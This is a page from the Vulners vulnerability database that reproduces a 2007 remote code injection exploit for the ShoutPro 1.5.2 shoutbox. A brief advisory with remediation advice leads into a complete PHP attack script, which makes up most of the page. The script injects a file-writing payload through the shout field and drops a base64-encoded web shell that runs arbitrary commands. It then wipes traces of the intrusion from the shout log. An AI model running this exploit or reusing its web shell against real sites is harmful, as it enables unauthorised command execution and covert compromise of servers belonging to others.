Vulners
Lucene search
ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit
<?/*
File: shoutbox.php
Affects: ShoutPro 1.5.2 (may affect earlier versions)
Date: 17th April 2007
Issue Description:
===========================================================================
ShoutPro 1.5.2 fails to fully sanitize user input ($shout) that it writes
to the shouts.php file when adding a new message, this can result in the
injection and execution of arbitrary php code.
===========================================================================
Scope:
===========================================================================
The vulnerability will in most cases allow an attacker to execute commands
on the system, the issue may be further perpetuated if the user has followed
the official documentation and chmoded the base folder to '777'
===========================================================================
Recommendation:
===========================================================================
1) Add code to perform strip_tags() on $shout in shoutbox.php
2) Prevent direct access to shouts.php with a .htaccess file
===========================================================================
Discovered By: Gammarays
*/?>
<?php
echo "########################################################\n";
echo "# Special Greetings To - Timq,Warpboy,The-Maggot #\n";
echo "########################################################\n\n\n";
//Writes Files - Under 100 bytes to meet requirements
$temppayload = "%3C%3F%24a%3Dfopen%28%24_POST%5B%27f%27%5D%2C%27w%27%29%3Bfwrite%28%24a%2Cbase64_decode%28%24_POST%5B%27d%27%5D%29%29%3Bfclose%28%24a%29%3B%3F%3E";
//Execute Commands + Performs Cleanup
$payload = "PD9waHAgCgppZihpc3NldCgkX0dFVFsnY21kJ10pKQp7CmVjaG8gc2hlbGxfZXhlYyh1cmxkZWNv".
"ZGUoJF9HRVRbJ2NtZCddKSk7CmRpZSgpOwp9CgppZigkX1BPU1RbJ2NsZWFuJ109PSdkb2l0Jykg".
"Y2xlYW4oKTsKCmZ1bmN0aW9uIGNsZWFuKCkKewogICRsMSA9IGZpbGUoJ3Nob3V0cy5waHAnKTsK".
"ICAkZmggPSBmb3Blbignc2hvdXRzLnBocCcsJ3cnKTsKICBpZighJGZoKSBkaWUoKTsKCiAgZm9y".
"ZWFjaCAoJGwxIGFzICRsMikgCiAgewoJaWYoIXN0cnN0cigkbDIsIiRhPWZvcGVuIikpCgl7CgkJ".
"ZnByaW50ZigkZmgsJGwyKTsKCX0gICAgCiAgfQogIGZjbG9zZSgkZmgpOwp9Cgo/Pg==";
if($argc!=2) die("Usage: <url> \n\tEx: http://www.example.com/shoutpro/\n");
$url = $argv[1];
//$url = "http://localhost/ShoutPro1.5.2/";
$ch = curl_init($url . "shoutbox.php");
if(!$ch) die("Error Initializing CURL");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(!$res) die("Error Connecting To Target - Is URL Valid?");
echo "[ ] Deploying Temp Payload...\n";
curl_setopt($ch, CURLOPT_URL,$url . "shoutbox.php?action=post");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"name=Beethoven&pass=&shout=".$temppayload."&post=Post");
$res = curl_exec($ch);
if(!$res) die("Error Deploying Temp Payload");
echo "[ ] Deploying Main Payload...\n";
curl_setopt($ch, CURLOPT_URL,$url . "shouts.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"f=module.php&d=".$payload);
$res = curl_exec($ch);
if(!$res) die("Error Deploying Main Payload");
echo "[ ] Attempting Clean Up...\n";
curl_setopt($ch, CURLOPT_URL,$url . "module.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"clean=doit");
$res = curl_exec($ch);
if(!$res) die("Error - Clean Up Failed");
echo "[ ] Clean Up Complete\n";
echo "[ ] Shell Accessible at ".$url."module.php?cmd=<yourcommand>";
curl_close($ch);
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1